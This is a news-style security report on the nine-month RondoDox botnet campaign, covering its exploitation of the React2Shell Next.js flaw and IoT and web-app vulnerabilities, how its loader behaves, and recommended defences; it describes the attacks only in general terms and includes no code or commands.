Ongoing Campaign Targets IoT Devices via RondoDox Botnet
Cybersecurity experts have unveiled new details surrounding a prolonged attack campaign that has persisted for nine months, specifically targeting Internet of Things (IoT) devices and various web applications. This operation has been geared towards recruiting these devices into a botnet dubbed RondoDox.
Exploitation of the React2Shell Vulnerability
As of December 2025, findings from CloudSEK indicate that the RondoDox botnet is exploiting a significant security vulnerability known as React2Shell (CVE-2025-55182), which has been given a critical CVSS score of 10.0. This flaw is associated with React Server Components (RSC) and Next.js, enabling attackers without proper authentication to execute remote code on vulnerable devices.
Statistics from the Shadowserver Foundation reveal that approximately 90,300 devices remain vulnerable as of the end of December 2025. The majority of these vulnerable instances—about 68,400—are located in the United States, followed by Germany with 4,300, France at 2,800, and India comprising 1,500.
Expansion of RondoDox Capabilities
Emerging in early 2025, RondoDox has expanded its reach by integrating new N-day vulnerabilities into its toolkit, including CVE-2023-1389 and CVE-2025-24893. Notably, the exploitation of React2Shell for the botnet’s spread was previously reported by cybersecurity firms like Darktrace, Kaspersky, and VulnCheck.
Phases of the RondoDox Campaign
The RondoDox campaign appears to have progressed through three distinct stages leading up to the exploitation of CVE-2025-55182:
- March – April 2025: Initial reconnaissance and manual vulnerability scanning.
- April – June 2025: Aggressive daily probing of vulnerabilities in widely used web applications such as WordPress, Drupal, and Struts2, as well as IoT devices including Wavlink routers.
- July – Early December 2025: Transition to automated, large-scale deployment efforts occurring hourly.
Recent Attack Identifications
Recent attacks detected in December 2025 showed that threat actors launched scans specifically to pinpoint vulnerable Next.js servers. These scans were followed by attempts to deploy various malicious payloads, including cryptocurrency miners, a botnet loader, and a variant of the Mirai botnet.
One such loader, designated as /nuts/bolts, is engineered to eliminate competing cryptocurrencies and malware before it downloads the primary bot binary from its command-and-control (C2) server. This variant actively removes remnants of competing botnets and Docker-based payloads, cleans up previous campaign traces, and sets up ongoing persistence via cron jobs.
RondoDox’s monitoring capabilities enable it to continuously scan the /proc directory to identify running processes. It terminates any non-whitelisted processes roughly every 45 seconds, effectively thwarting efforts by rival actors aiming to reinfect compromised devices.
Recommendations for Enhancing Cybersecurity
To safeguard against the threats posed by the RondoDox botnet, organizations are strongly urged to adopt several preventive measures. These include ensuring that Next.js is promptly updated to a patched version, segmenting all IoT devices into dedicated VLANs, deploying Web Application Firewalls (WAFs), closely monitoring for suspicious process executions, and blocking known C2 infrastructure.
With the evolving landscape of cybersecurity threats, proactive measures are essential in mitigating vulnerabilities and protecting sensitive networks from exploitation.
